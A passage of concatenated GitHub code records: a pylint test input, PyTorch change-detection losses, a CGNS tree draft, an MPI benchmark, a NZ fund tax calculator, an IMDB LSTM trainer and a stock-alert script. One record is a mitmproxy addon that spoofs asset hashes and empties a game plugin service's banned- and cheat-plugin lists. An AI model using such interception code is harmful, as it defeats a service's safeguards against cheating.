
self\n specs = self.getRecorda()\n mydict = {1:1, 2:2}\n mylist = [1, 2]\n listcomp = \"listcomp,\" + \"extra\"\n if test > 0:\n return specs.Status\n x = \"'%s' as test_date\\n, \" % date(\"\")\n x += \"'%s' as test_time\\n, \" % time(\"\")\n x += \"'%i' as test_len\\n, \" % len(specs.RootLabel)\n x += \"'%s' as test_map\\n, \" % \"','\".join(map(str, mylist))\n x += \"'%s' as test_keys\\n, \" % \"','\".join(mydict.keys())\n x += \"'%s' as test_subscript\\n,\" % [\"SerNr\",\"RoomType\"][specs.Status]\n #x += \"'%s' as test_classattr\\n, \" % self.classattr\n x += '\"%s\" as test_dic\\n, ' % mydict\n x += \"'%s' as test_parentattr\\n, \" % parent.record #Parent None attribute\n x += '\"%s\" as test_binoplist\\n, ' % mylist #+ mylist\n x += '\"%s\" as test_listcomp1\\n, ' % \"\".join([a.strip() for a in listcomp.split(',')])\n x += '\"%s\" as test_listcomp2\\n, ' % \"\".join([d for d in listcomp])\n x += '\"%s\" as test_listcomp3\\n, ' % \"\".join([str(b) for b in listcomp])\n x += '\"%s\" as test_listcomp4\\n,' % \"\".join([c.strip() for c in listcomp])\n x += '\"%s\" as test_listcomp5\\n,' % [('s|%s|') % (z) for z in mylist]\n x += '\"%s\" as test_listcomp6\\n,' % \"\".join([y for y in (\"a\", \"b\")])\n # pylint:disable=E1101\n x += '\"%s\" as inferenceErr\\n,' % self.non.existant\n x += '\"%s\" as indexErr\\n' % mylist[2]\n return x\n\n def getExtra3(self):\n specs = self.getRecorda()\n subquery = Query()\n subquery.sql = \"SerNr\"\n return \"ORDER BY %s, %s\" % (specs.SerNr, subquery.sql)\n\n def getExtra4(self):\n specs = self.getRecorda()\n labels = None\n if specs.Labels:\n lis = []\n labs = specs.Labels.split(\",\")\n for lb in labs:\n lis.append(\"','\".join(Label.getTreeLeaves(lb)))\n labels = \"','\".join(lis)\n return \"WHERE?AND SerNr IN ('%s') \" % labels\n\n def getExtra5(self, txt):\n txt = txt.replace(\":1\",\"RoomType IS NULL\\n\")\n return txt\n\n def getExtra6(self):\n txt = \"\"\n q = {}\n q[\"one\"] = Query()\n q[\"one\"].sql = \"WHERE?AND SerNr IS NULL\\n\"\n q[\"two\"] = Query()\n q[\"two\"].sql = \"WHERE?AND SerNr IS NOT NULL\\n\"\n slist = [\"one\", \"two\"]\n for index in slist:\n txt += q[index].sql\n return txt\n\n def getExtra7(self):\n specs = self.getRecorda()\n factor = 0.0\n if 1 > 0:\n factor = (float(specs.Status) / float(specs.Status))\n txt = \"WHERE?AND (%s / 1) * %s > 0\\n\" % (1, factor)\n return txt\n\n def run(self):\n specs = self.getRecorda()\n leaves = Label.getTreeLeaves(specs.RootLabel)\n query7 = Query()\n query7.sql = \"SELECT SerNr, %s,\\n\" % codeOrder(\"SerNr\", leaves)\n query7.sql += monthCode(\"[al].TransDate\")\n query7.sql += \"\\n, %s, \\n\" % self.getExtra2(test=1)\n query7.sql += self.getExtra2(0)\n query7.sql += \"\\nFROM %s al\\n\" % specs.name()\n query7.sql += self.getExtra(\"1\", \"2\", val3=\"33\")\n query7.sql += self.getExtra4()\n query7.sql += self.getExtra5(\"WHERE?AND :1\")\n query7.sql += self.getExtra6()\n query7.sql += self.getExtra7()\n\n method = getattr(self, \"getExtra3____\"[:-4])\n query7.sql += method()\n query7.open()\n self.run2([100, 200])\n\n def run2(self, extraList):\n query2 = Query()\n query2.sql = self.getMore(extraList)\n query2.open()\n\n def getMore(self, moreList):\n return \"SELECT * FROM Alotment WHERE SerNr IN ('%s')\" % 
\"','\".join(moreList)\n","repo_name":"ancho85/pylint-playero-plugin","sub_path":"tests/input/func_noerror_query_getattr.py","file_name":"func_noerror_query_getattr.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12064095262","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom util.Weight import Weight\nclass NegativeLearningLoss(nn.Module):\n def __init__(self, threshold=0.05):\n super(NegativeLearningLoss, self).__init__()\n self.threshold = threshold\n\n def forward(self, predict):\n mask = (predict < self.threshold).detach()\n negative_loss_item = -1 * mask * torch.log(1 - predict + 1e-6)\n negative_loss = torch.sum(negative_loss_item) / torch.sum(mask)\n\n return negative_loss\n\nclass CORAL(nn.Module):\n def __init__(self):\n super(CORAL, self).__init__()\n\n def CORAL(self,source, target):\n d = source.data.shape[1]\n ns, nt = source.data.shape[0], target.data.shape[0]\n # source covariance\n # print('source',source.shape)#18, 1024]\n xm = torch.mean(source, 0, keepdim=True) - source\n xc = xm.t() @ xm / (ns - 1)\n\n # target covariance\n xmt = torch.mean(target, 0, keepdim=True) - target\n xct = xmt.t() @ xmt / (nt - 1)\n\n # frobenius norm between source and target\n loss = torch.mul((xc - xct), (xc - xct))\n loss = torch.sum(loss) / (4 * d * d)\n return loss\n\n def selecdata(self,feature, label):\n label_flatten = torch.flatten(label.squeeze(1), start_dim=0, end_dim=2)\n feature_flatten = torch.flatten(feature.permute((1, 0, 2, 3)), start_dim=1, end_dim=3)\n label_index = torch.nonzero(label_flatten)\n\n label_index = torch.flatten(label_index)\n label_index_rand = torch.randperm(label_index.nelement())\n label_index = label_index[label_index_rand]\n feature_flatten_select = feature_flatten[:, label_index[0]].unsqueeze(0)\n return feature_flatten_select, label_index, feature_flatten\n def forward(self, source, target,label_source,pred_target):\n chgthreshold=800\n unchgthreshold=800\n H, W = source.size(2), source.size(3)\n label_source = F.interpolate(label_source.unsqueeze(1).float(), size=(H, W), mode='bilinear', align_corners=False)\n pred_target = F.interpolate(pred_target.unsqueeze(1).float(), size=(H, W), mode='bilinear', align_corners=False)\n ones = torch.ones_like(label_source)\n zeros = torch.zeros_like(label_source)\n label_source = torch.where(label_source > 0.5, ones, zeros)\n pred_target = torch.where(pred_target > 0.5, ones, zeros)\n ############### change origin\n # source = (label_source.repeat([1, source.shape[1], 1, 1])).float()\n # target = (pred_target.repeat([1, target.shape[1], 1, 1])).float()\n source_chg_flatten_select,source_chg_index,source_chg_flatten=self.selecdata(source,label_source)\n target_chg_flatten_select,target_chg_index,target_chg_flatten=self.selecdata(target,pred_target)\n # one=torch.ones_like(source_chg_flatten[:,1])\n\n # print('source_chg_flatten_select',source_chg_flatten_select.shape)\n if source_chg_index.shape[0][bs,h,w,2]\n softmaxLabelori=softmaxLabel\n # print('softmaxLabelori',softmaxLabelori.shape,pseudo_label.shape)\n self.uu = (softmaxLabel[:, 0, :, :] * (1 - pseudo_label.squeeze(1))).sum() / ((1 - pseudo_label).sum() + 1)\n self.cc = ((softmaxLabel[:, 1, :, :]) * pseudo_label.squeeze(1)).sum() / (pseudo_label.sum() + 1)\n\n softmaxLabel = torch.flatten(softmaxLabelori.permute((0, 2, 3, 1)), start_dim=0, end_dim=2) # bs,2\n\n # softLogS = softLogS.reshape(-1, 2, 
s_label.shape[2], s_label.shape[3]) # [bs,2,h,w]->[bs,h,w,2]\n # softLogS = torch.flatten(softLogS.permute((0, 2, 3, 1)), start_dim=0, end_dim=2) # bs,2\n # softLogT = softLogT.reshape(-1, 2, s_label.shape[2], s_label.shape[3]) # [bs,2,h,w]->[bs,h,w,2]\n # softLogT = torch.flatten(softLogT.permute((0, 2, 3, 1)), start_dim=0, end_dim=2) # bs,2\n######################change\n source_chg_flatten_select, source_chg_index, source_chg_flatten = self.selecdata(source, s_label)\n ones=torch.ones_like(pseudo_label)\n zeros=torch.zeros_like(pseudo_label)\n\n pseudo_labeltChg=torch.where(softmaxLabelori[:,1,:,:].unsqueeze(1)>(p-pe),pseudo_label,zeros).detach()############################3############################3############################3############################3############################3\n # pseudo_labeltChg=torch.where((softmaxLabelori[:,1,:,:]/softmaxLabelori[:,1,:,:].max()).unsqueeze(1)>p,pseudo_label,zeros)\n # print('pseudo_label',pseudo_labeltChg.shape,pseudo_label.shape,pseudo_label.sum(),pseudo_labeltChg.sum())\n target_chg_flatten_select, target_chg_index, target_chg_flatten = self.selecdata(target, pseudo_labeltChg)\n\n\n if source_chg_index.shape[0] < chgthreshold or target_chg_index.shape[0] < chgthreshold:\n chgthreshold = np.minimum(source_chg_index.shape[0], target_chg_index.shape[0])\n source_chg_flatten_select = source_chg_flatten[source_chg_index[0:chgthreshold],:]#bs,c\n target_chg_flatten_select = target_chg_flatten[target_chg_index[0:chgthreshold],:]#bs,c\n # print(pp.shape,target_chg_flatten.shape)\n # target_pchg=pp[target_chg_index[0:chgthreshold].cpu(),:].unsqueeze(0)\n # print('target_p',target_p)\n softmaxLabel_chg_select = softmaxLabel[target_chg_index[0:chgthreshold]] # [bs,2]\n\n # softLogT_chg_select = softLogT[target_chg_index[0:chgthreshold]] # [bs,2]\n # softLogS_chg_select = softLogS[source_chg_index[0:chgthreshold]]\n # print(softmaxLabel_chg_select)\n # print('softmaxLabel_chg_select',softmaxLabel_chg_select.shape)\n # target_chg_flatten_selectW = target_chg_flatten_select * softmaxLabel_chg_select[:, 1].unsqueeze(1)\n####################unchg\n source_unchg_flatten_select, source_unchg_index, source_unchg_flatten = self.selecdata(source, 1 - s_label)\n # print('softmaxLabel',softmaxLabel.shape)\n pseudo_labeltunChg = torch.where(softmaxLabelori[:,0,:,:].unsqueeze(1)>p, pseudo_label, ones).detach()############################3############################3############################3############################3\n # pseudo_labeltunChg = torch.where((softmaxLabelori[:,0,:,:]/softmaxLabelori[:,0,:,:].max()).unsqueeze(1)>p, pseudo_label, ones)\n\n\n target_unchg_flatten_select, target_unchg_index, target_unchg_flatten = self.selecdata(target, 1 - pseudo_labeltunChg)\n\n\n if source_unchg_index.shape[0] < unchgthreshold or target_unchg_index.shape[0] < unchgthreshold:\n unchgthreshold = np.minimum(source_unchg_index.shape[0], target_unchg_index.shape[0])\n if unchgthreshold > chgthreshold:\n unchgthreshold = chgthreshold\n source_unchg_flatten_select = source_unchg_flatten[source_unchg_index[0:unchgthreshold], :] # bs,c\n # softLogS_unchg_select=softLogS[source_unchg_index[0:unchgthreshold]]\n\n target_unchg_flatten_select = target_unchg_flatten[target_unchg_index[0:unchgthreshold], :] # bs,c\n # target_punchg = pp[target_unchg_index[0:unchgthreshold].cpu(), :].unsqueeze(0)\n softmaxLabel_unchg_select = softmaxLabel[target_unchg_index[0:unchgthreshold]]\n # softLogT_unchg_select = softLogT[target_unchg_index[0:unchgthreshold]]\n # 
print('target_pchg',target_pchg.shape,target_punchg.shape)\n # target_unchg_flatten_selectW = target_unchg_flatten_select * softmaxLabel_unchg_select[:, 0].unsqueeze(1)#weight\n self.chgNum = chgthreshold\n self.unchgNum = unchgthreshold\n unchglabel = self.to_onehot(torch.zeros_like(softmaxLabel_unchg_select[:, 0]).long(), 2)\n chglabel = self.to_onehot(torch.ones_like(softmaxLabel_unchg_select[:, 1]).long(), 2)\n # print(unchglabel, chglabel)\n # print('s',softmaxLabel_unchg_select.shape,softmaxLabel_chg_select[1].shape,softmaxLabel_unchg_select[:,0].min(),softmaxLabel_chg_select[:,1].min())\n s_label_select = torch.cat([unchglabel,chglabel], dim=0).detach()\n # print('s_label_select',s_label_select)\n t_label_select = torch.cat([softmaxLabel_unchg_select,softmaxLabel_chg_select ], dim=0).detach()\n # print('softmaxLabel_unchg_select',t_label_select.shape)\n t_label_select2=torch.cat([softmaxLabel_unchg_select,softmaxLabel_chg_select ], dim=0).detach()\n # softLogS=torch.cat([softLogS_unchg_select,softLogS_chg_select], dim=0)\n # softLogT=torch.cat([softLogT_unchg_select,softLogT_chg_select], dim=0)\n\n # print('t_label_select2',t_label_select2.shape)\n return source_chg_flatten_select, source_unchg_flatten_select, target_chg_flatten_select, target_unchg_flatten_select, \\\n s_label_select, t_label_select, t_label_select2, []\n # return source_chg_flatten_select, source_unchg_flatten_select, target_chg_flatten_select, target_unchg_flatten_select,\\\n # s_label_select,t_label_select,t_label_select2,torch.cat([target_pchg,target_punchg],dim=0)","repo_name":"Fanrongbo/IRD-CD-UDA","sub_path":"util/metrics_DA.py","file_name":"metrics_DA.py","file_ext":"py","file_size_in_byte":16843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36234528137","text":"\"\"\"\n Draft. The idea is to have an alternative to the current list-of-list PyTree representation of a CGNS tree that is\n - backward compatible with the list-of-list (idea: inherit from `list` and rely on duck-typing)\n - offers `.name`, `.label`, `.value`, `.children` attributes, more explicit than [0], [3], [1], [2]\n - offers a `.parent` attribute that makes the tree backward iterable (i.e. a node can get access to its parents by itself) \n\n Advantages:\n - still very regular and lightweigh tree structure, independent from the SIDS\n - backward compatible\n - more explicit\n - we can have more check on admissible values\n - we can reconstruct the full path of a node without giving the root tree\n\n Limitations:\n - independent from the SIDS \n - good because no need to implement the SIDS\n - bad because no built-in checks related to the SIDS (\"class invariants\")\n - once a library function relies on more that the common PyTree interface (e.g. 
it uses `.parent`)\n then the function can't be called on a plain regular PyTree\n\"\"\"\n\nclass cgns_tree(list):\n def __init__(self, name, label, value, children, parent=None):\n self.name = name\n self.label = label \n self.value = value\n self.children = children\n self.parent = parent\n\n def child(self, i):\n _child = self.children[i]\n return cgns_tree(_child.name, _child.label, _child.value, _child.children, self)\n\n def __getitem__(self, i):\n if i==0:\n return self.name\n if i==1:\n return self.value\n if i==2:\n return self.children\n if i==3:\n return self.label\n raise RuntimeError()\n \n\ndef pytree_to_cgns_tree(pytree, parent=None):\n children = [pytree_to_cgns_tree(pytree_child) for pytree_child in pytree[2]]\n return cgns_tree(pytree[0], pytree[3], pytree[1], children)\n \n\ndef test_super_cgns_interface():\n pytree = ['Zone', [[9,0,0],[4,0,0],[0,0,0]], [['Hexa',[17],[],'Elements_t']], 'Zone_t']\n t = pytree_to_cgns_tree(pytree)\n\n # new interface\n assert t.name == 'Zone'\n hexa = t.child(0)\n assert hexa.name == 'Hexa'\n assert hexa.parent.name == 'Zone'\n\n # backward-compatible old interface\n assert t[0] == 'Zone'\n assert isinstance(t, list)\n","repo_name":"onera/Maia","sub_path":"maia/pytree/graph/test/test_alternative_cgns_interface.py","file_name":"test_alternative_cgns_interface.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"27808724620","text":"from mitmproxy import http\nimport json\nclass Unban:\n def __init__(self):\n self.bannedplugin_keyword='bannedplugin'\n self.chetplugin_keyword='cheatplugin'\n self.asset_meta_keyword='Asset/Meta'\n def response(self,flow:http.HTTPFlow):\n #detect hash checking\n if self.asset_meta_keyword in flow.request.pretty_url:\n res=json.loads(flow.response.text)\n assets=res['Assets']\n for asset in assets:\n if 'bannedplugin.json' in asset['FileName']:\n print('filename found,modifying')\n asset['Hash']='8ffc185ec1cae72bf30b6490d489a520d5bdbfc1'.upper()\n elif 'cheatplugin.json' in asset['FileName']:\n print('filename found,modifying')\n asset['Hash']='d416be7ffea7451d10ff744e621db7345ceec16d'.upper()\n continue\n flow.response.set_text(json.dumps(res))\n print (flow.response.text)\n #detect banlist checking\n if self.bannedplugin_keyword in flow.request.pretty_url:\n print('keyword : bannedplugin detected')\n print (flow.request.pretty_url)\n print ('injacking....')\n flow.response.set_text(json.dumps([{\"Name\": \"asdfw\",\"AssemblyVersion\": \"1.0\"}]))\n print (flow.response.text)\n #detect cheatlist checking\n if self.chetplugin_keyword in flow.request.pretty_url:\n print('keyword : bannedplugin detected')\n print (flow.request.pretty_url)\n print ('injacking....')\n flow.response.set_text(json.dumps([{\"Name\": \"53F809A7DAC\",\"AssemblyVersion\": \"0.0.0.0\"}]))\n print (flow.response.text)\n \n \n \n","repo_name":"sakuraDan2023/dalamudUnban","sub_path":"src/addons/unbanded.py","file_name":"unbanded.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"71797721866","text":"import math\n\nfrom mpi4py import MPI\nimport numpy as np\n\n# Initialize MPI\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\n\nmaxSize = 1000000\n\nN = 1000\n\n\ndef send(size):\n global N\n\n start_time = MPI.Wtime()\n for i in range(0, N):\n sendBuf = np.empty(size, dtype=np.uint8)\n comm.Bsend(sendBuf, dest=0, tag=123)\n comm.Recv(sendBuf, 
source=0, tag=123)\n end_time = (MPI.Wtime() - start_time) / N\n return end_time\n\n\ndef receive(size):\n global N\n\n for i in range(0, N):\n recvBuf = np.empty(size, dtype=np.uint8)\n comm.Recv(recvBuf, source=1, tag=123)\n comm.Bsend(recvBuf, dest=1, tag=123)\n\n\ndef test(maxSizeLocal, p_rank, size):\n comm.Barrier()\n buffer = np.empty(maxSizeLocal * 4, dtype='b')\n MPI.Attach_buffer(buffer)\n if p_rank == 0:\n receive(size)\n else:\n time = send(size)\n mbsize = size / math.pow(10, 6)\n v = mbsize / time\n print(v, size)\n MPI.Detach_buffer()\n del buffer\n\n\ndef test_capacity(p_rank):\n global maxSize\n for size in range(0, 1000000, 10000):\n test(maxSize, p_rank, size)\n\n\ndef test_delay(p_rank):\n global maxSize\n size = 1\n test(maxSize, p_rank, size)\n\n\ntest_delay(rank)\n","repo_name":"bszlacht/mpr","sub_path":"zad1/BufferedSend.py","file_name":"BufferedSend.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19754697661","text":"#!/bin/bash/python\n\nimport enum\nimport pandas as pd\nimport logging\nimport argparse\n\n\n\"\"\"\nSHARESIES_COLS = ['Oder ID', 'Trade date', 'Instrument code', 'Market code',\n 'Quantity', 'Price', 'Transaction type', 'Exchange rate', 'Exchange fee',\n 'Transaction fee', 'Currency', 'Amount', 'Transaction method']\n\"\"\"\n\n\ndef peak_holding_differential(transactions, ticker, start_amount=0):\n \"\"\"Calculates the peak holding differential\"\"\"\n transactions = filter_by_ticker(transactions, ticker)\n cur = start_amount\n peak = start_amount\n for idx, row in transactions.iterrows():\n ttype = row['Transaction type']\n if ttype == 'BUY':\n cur += row['Quantity']\n elif ttype == 'SELL':\n cur -= row['Quantity']\n else:\n raise Exception(f'Unexpected transaction type: {ttype}.')\n peak = max(peak, cur)\n end_amount = cur\n peak_diff = max(0, min(peak - end_amount, peak - start_amount))\n return peak_diff\n\n\ndef filter_by_ticker(transactions, ticker):\n df = transactions.loc[lambda df : df['Instrument code'] == ticker, :]\n return df\n\n\ndef filter_by_exchanges(transactions, exchange_codes):\n def f(row):\n return row['Market code'] in exchange_codes\n idx = transactions.apply(f, axis=1)\n res = transactions[idx]\n return res\n\n\ndef filter_by_type(transactions, transaction_type):\n if not transaction_type in {'BUY', 'SELL'}:\n raise Exception(f'Unexpected transaction type: {transaction_type}')\n df = transactions.loc[ \\\n lambda df : df['Transaction type'] == transaction_type, :]\n return df\n \n\ndef average_cost_nzd(transactions, ticker):\n ts = filter_by_type(filter_by_ticker(transactions, ticker), 'BUY')\n total_shares = ts['Quantity'].sum()\n total_cost = (ts['Amount'] * 1/ts['Exchange rate']).sum()\n average_cost = total_cost / total_shares\n return average_cost\n\n\ndef peak_holding_method(transactions, ticker):\n phd = peak_holding_differential(transactions, ticker)\n avg_cost = average_cost_nzd(transactions, ticker)\n factor = 0.05\n ans = factor * phd * avg_cost\n return ans\n\n\ndef gain_method(transactions, ticker):\n avg_cost = average_cost_nzd(transactions, ticker)\n sells = filter_by_type(filter_by_ticker(transactions, ticker), 'SELL')\n sell_amounts = sells['Amount'] * sells['Exchange rate']\n gains = sell_amounts - avg_cost * sells['Quantity']\n total_gain = gains.sum()\n total_gain = max(0, total_gain)\n return total_gain\n \n\ndef taxable_amount(transactions, ticker):\n phd = peak_holding_method(transactions, 
ticker)\n gain = gain_method(transactions, ticker)\n if phd <= gain:\n ans = phd\n logging.info(f'{ticker}. Using peak method (gain: {gain:.2f}, '\n f'peak: {phd:.2f}).')\n else:\n ans = gain\n logging.info(f'{ticker}. Using gain method (gain: {gain:.2f}, '\n f'peak: {phd:.2f}).')\n logging.info(f'{ticker}. Taxable amount is: {ans:.2f}')\n return ans\n\n\ndef list_tickers(transactions):\n return transactions['Instrument code'].unique().tolist()\n\n\ndef total_taxable_amount(transactions):\n # We are only dealing with NYSE, NASDAQ and ASX at the moment.\n exchanges = transactions['Market code'].unique()\n covered_exchanges = {'NYSE', 'NASDAQ', 'ASX'}\n ignored_exchanges = set(exchanges) - covered_exchanges\n logging.info(f'Transactions present on the following exchanges: '\n f'{exchanges}')\n logging.warning(f'Including exchanges {covered_exchanges}.\\nIgnoring: '\n f'{ignored_exchanges}')\n transactions = filter_by_exchanges(transactions, covered_exchanges)\n ans = 0\n for t in list_tickers(transactions):\n ans += taxable_amount(transactions, t)\n return ans\n\n\ndef import_sharesies_csv(filepath):\n df = pd.read_csv(filepath, header=0)\n return df\n\n\ndef main():\n logging.basicConfig()\n logging.getLogger().setLevel(logging.INFO)\n parser = argparse.ArgumentParser()\n parser.add_argument('file', help='Path to Sharesies transaction csv file.')\n args = parser.parse_args()\n filepath = args.file\n transactions = import_sharesies_csv(filepath)\n taxable_amount = total_taxable_amount(transactions)\n logging.info(f'Total taxable amount: {taxable_amount:.2f}')\n print(f'{taxable_amount:.2f}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kevindoran/nzfiftax","sub_path":"src/nzfiftax/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"73335051466","text":"import torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom torchtext import data, datasets\nimport numpy as np\n\n\n#print('GPU:', torch.cuda.is_available())\n\ntorch.manual_seed(123) # 为CPU中设置种子,生成随机数\n# 设置随机种子可以确保每次生成固定的随机数,这就使得每次实验结果显示一致了,有利于实验的比较和改进。\n\n\n'''载入数据'''\nTEXT = data.Field(tokenize='spacy', tokenizer_language='en_core_web_sm')\nLABEL = data.LabelField(dtype=torch.float)\ntrain_data, test_data = datasets.IMDB.splits(TEXT, LABEL)\n\n#print('len of train data:', len(train_data)) # len of train data: 25000\n#print('len of test data:', len(test_data)) # len of test data: 25000\n\n#print(train_data.examples[15].text)\n#print(train_data.examples[15].label)\n\n# 对文本内容进行编码\nTEXT.build_vocab(train_data, max_size=10000, vectors='glove.6B.100d')\nLABEL.build_vocab(train_data)\n\n\nbatchsz = 16\ndevice = torch.device('cuda')\ntrain_iterator, test_iterator = data.BucketIterator.splits(\n (train_data, test_data),\n batch_size=batchsz,\n device=device\n)\n\n\nclass MyLSTM(nn.Module):\n\n def __init__(self, vocab_size, embedding_dim, hidden_dim):\n \"\"\"\n \"\"\"\n super(MyLSTM, self).__init__()\n\n # [0-10001] => [100]\n self.embedding = nn.Embedding(vocab_size, embedding_dim) # 对单词进行编码。\n # 编码vocab_size个单词,每个单词编码为embedding_dim维度的向量\n # [100] => [256]\n self.rnn = nn.LSTM(embedding_dim, hidden_dim, num_layers=2,\n bidirectional=True, dropout=0.5) # memory是hidden_dim\n # [256*2] => [1]\n self.fc = nn.Linear(hidden_dim * 2, 1)\n self.dropout = nn.Dropout(0.5)\n\n def forward(self, x):\n \"\"\"\n x: [seq_len, b] vs [b, 3, 28, 28]\n \"\"\"\n # [seq, b, 1] => [seq, b, 100]\n embedding 
= self.dropout(self.embedding(x))\n\n # output: [seq, b, hid_dim*2]\n # hidden/h: [num_layers*2, b, hid_dim]\n # cell/c: [num_layers*2, b, hid_di]\n output, (hidden, cell) = self.rnn(embedding)\n\n # [num_layers*2, b, hid_dim] => 2 of [b, hid_dim] => [b, hid_dim*2]\n hidden = torch.cat([hidden[-2], hidden[-1]], dim=1)\n\n # [b, hid_dim*2] => [b, 1]\n hidden = self.dropout(hidden)\n out = self.fc(hidden)\n\n return out\n\n\n# 定义GRU网络\n\nclass GRUNet(nn.Module):\n def __init__(self, vocab_size,embedding_dim, hidden_dim, layer_dim, output_dim):\n \"\"\"\n vocab_size:词典长度\n embedding_dim:词向量的维度\n hidden_dim: GRU神经元个数\n layer_dim: GRU的层数\n output_dim:隐藏层输出的维度(分类的数量)\n \"\"\"\n super(GRUNet, self).__init__()\n self.hidden_dim = hidden_dim ## GRU神经元个数\n self.layer_dim = layer_dim ## GRU的层数\n ## 对文本进行词项量处理\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n # LSTM + 全连接层\n self.gru = nn.GRU(embedding_dim, hidden_dim, layer_dim,\n batch_first=True)\n self.fc1 = nn.Sequential(\n nn.Linear(hidden_dim, hidden_dim),\n torch.nn.Dropout(0.5),\n torch.nn.ReLU(),\n nn.Linear(hidden_dim, output_dim)\n )\n def forward(self, x):\n embeds = self.embedding(x)\n # r_out shape (batch, time_step, output_size)\n # h_n shape (n_layers, batch, hidden_size)\n r_out, h_n = self.gru(embeds, None) # None 表示初始的 hidden state 为0\n # 选取最后一个时间点的out输出\n out = self.fc1(r_out[:, -1, :])\n return out\n\n\n'''构建网络'''\nLSTM = MyLSTM(len(TEXT.vocab), 100, 256)\n#GRU = GRUNet(len(TEXT.vocab), 100, 256, 1, 1)\nstate_dict = torch.load('net_params.pth')\nLSTM.load_state_dict(state_dict)\n\npretrained_embedding = TEXT.vocab.vectors\nprint('pretrained_embedding:', pretrained_embedding.shape)\nLSTM.embedding.weight.data.copy_(pretrained_embedding)\n#GRU.embedding.weight.data.copy_(pretrained_embedding)\nprint('embedding layer inited.')\n\noptimizer = optim.Adam(LSTM.parameters(), lr=5e-4)\n#optimizer = optim.Adam(GRU.parameters(), lr=5e-4)\ntorch.optim.lr_scheduler.StepLR(optimizer, 2, gamma=0.5, last_epoch=-1)\ncriteon = nn.BCEWithLogitsLoss().to(device)\nLSTM.to(device)\n#GRU.to(device)\n\ntrain_loss = []\ntrain_acc = []\ntest_loss = []\ntest_acc = []\n\n\ndef binary_acc(preds, y):\n \"\"\"\n get accuracy\n \"\"\"\n preds = torch.round(torch.sigmoid(preds))\n correct = torch.eq(preds, y).float()\n acc = correct.sum() / len(correct)\n return acc\n\n\ndef train(model, iterator, optimizer, criteon):\n avg_acc = []\n avg_loss = []\n model.train()\n\n for i, batch in enumerate(iterator):\n\n # [seq, b] => [b, 1] => [b]\n if hasattr(torch.cuda, 'empty_cache'):\n torch.cuda.empty_cache()\n pred = model(batch.text).squeeze(1)\n #print(pred.size())\n #print(batch.label.size())\n #\n loss = criteon(pred, batch.label)\n avg_loss.append(loss.item())\n acc = binary_acc(pred, batch.label).item()\n avg_acc.append(acc)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if i % 50 == 0:\n print(i, acc)\n\n avg_acc = np.array(avg_acc).mean()\n train_loss.append(np.array(avg_loss).mean())\n train_acc.append(avg_acc)\n print('train loss', np.array(avg_loss).mean())\n print('avg acc:', avg_acc)\n torch.save(model.state_dict(),'net_params.pth')\n\n\ndef eval(model, iterator, criteon):\n avg_acc = []\n avg_loss = []\n\n model.eval()\n\n with torch.no_grad():\n for batch in iterator:\n # [b, 1] => [b]\n pred = model(batch.text).squeeze(1)\n\n #\n loss = criteon(pred, batch.label)\n avg_loss.append(loss.item())\n\n acc = binary_acc(pred, batch.label).item()\n avg_acc.append(acc)\n\n avg_acc = np.array(avg_acc).mean()\n 
test_loss.append(np.array(avg_loss).mean())\n test_acc.append(avg_acc)\n print('test loss', np.array(avg_loss).mean())\n print('>>test:', avg_acc)\n\n\nfor epoch in range(10):\n train(LSTM, train_iterator, optimizer, criteon)\n eval(LSTM, test_iterator, criteon)","repo_name":"LouZhipeng/traning","sub_path":"task3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42173727944","text":"import pandas as pd # Para evitar escrever pandas e trocar pela escrita apenas de pd para facilitar\nfrom pandas_datareader import data as web # Evita a escrita do data e troca pelo web\nimport time\nimport datetime\nimport smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nimport mariadb\n\ndef verMinDate(date,vals): ## função para retornar a date que ocorreu o valor minimo\n for i in range(len(vals)):\n if vals[i] == min(vals):\n return date[i]\n\ndata_final = time.strftime('%m-%d-%y', time.localtime(time.time()))\n## criando a data inicial (3 meses)\none_day = 60*60*24\ninterval = 6 ## intervalo de tempo em meses\n\ndata_inicial = time.strftime('%m-%d-%y', time.localtime(time.time()-interval*30*one_day))\ndata_inicial = datetime.datetime.strptime(data_inicial, '%m-%d-%y') ##definindo a data inicial\n\nmsg_aval_since = \"\"\"\\\nProcurando por uma janela de oportunidade de venda para os fundos da planilha 'paricipacao.xlsx'.\nDesde a data {}(Mês-Dia-Ano) até agr\n\"\"\"\nprint(msg_aval_since.format(data_inicial))\n\nempresas_df = ('BNFS11', 'BBPO11') # FIIs na carteira)\n\n#conectando com o banco de dados\nmydb = mariadb.connect(\n\thost=\"localhost\",\n\tuser=\"root\",\n\tpassword=None,\n\tdatabase=\"invest\"\n)\nmycursor = mydb.cursor()\n\n\nfor empresa in empresas_df:\n # montando a lista para conter os dados dos fiis\n sql = f\"SELECT cot, ultInsert FROM fiib3daily WHERE cod = '{empresa}' ORDER BY ultInsert\" ## buscando o\n # ultimo balanço das empresas no db\n mycursor.execute(sql)\n result = mycursor.fetchall()\n cot_dados = [] # para conter os dados das cotações\n\n for r in result:\n if r[1] >= data_inicial: # filtrando as datas acima da inicial\n cot_dados.append(r)\n\n df = pd.DataFrame(cot_dados, columns=('cotacao', 'data')) # defininco o data frame\n\n if len(df['cotacao']) > 1: # verificando se tem pelo menos mais de 2 valores para a cotação\n var = 